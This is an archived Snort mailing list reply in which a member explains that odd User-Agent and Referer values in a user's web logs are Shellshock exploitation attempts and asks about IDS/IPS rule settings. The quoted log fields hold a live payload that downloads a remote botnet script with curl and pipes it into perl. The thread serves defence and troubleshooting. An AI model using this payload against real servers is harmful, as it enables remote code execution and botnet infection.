Snort mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Odd http requests in the logs

From: waldo kitty <wkitty42 () windstream net>
Date: Mon, 03 Nov 2014 14:15:21 -0500
On 11/2/2014 11:23 PM, Richard Geddes wrote:

Hello,

I received a few (9) events in my web logs with the following fields:

agent : "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png |
perl"

referrer : "() { :; }; curl
http://202.28.77.53/~prajaks/310482/index.png | perl"


these are shellshock attempts... they are trying to use a macro hole in the bash 
command interpreter...


downloaded index.png, and it turns out to be a base64 encoded perl
script that has comments about a botnet.  It seems to target apache.


yes, that script is a "2nd phase" that's only operational if the shellshock 
bypass attempts works... it also requires curl and perl to be installed and 
operational... curl for the retrieval and perl for the botnet script execution...


I'm using snort with snort VRT Rules on a pfsense firewall, and pfsense,
snort, and the snort rules are up-to-date


do you have the shellshock detection rules enabled?


snort seems to be passing these requests on to my web server, and it
seems to me they should be blocked.


does the pfsense installation of snort operate as IDS (intrusion detection 
system) or IPS (intrusion protection system)?

in either case, if the rules are not enabled to detect this problem, snort won't 
react to traffic that matches...


I don't know enough about how web servers and log handlers process this
data to determine if it's a threat.


the way it works is if those fields are processed by a bash CLI session... they 
create a macro that bash doesn't properly handle and it executes the commands 
after the semi-colon ";"... that's the bug... bash should stop processing the 
macro when it sees the semi-colon... if you are running a *nix OS, you should 
have already gotten several security updates fixing this problem...


Is there a way to tell snort to block http requests with these fields?
The source of the malicious file should probably be regex'd  in case
there are alternate sources of this file.


blocking depends on your installation and its capabilities...

-- 
  NOTE: No off-list assistance is given without prior approval.
        Please *keep mailing list traffic on the list* unless
        private contact is specifically requested and granted.

------------------------------------------------------------------------------
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://sourceforge.net/mailarchive/forum.php?forum_name=snort-users

Please visit http://blog.snort.org to stay current on all the latest Snort news!
Previous By Date Next
Previous By Thread Next

Current thread: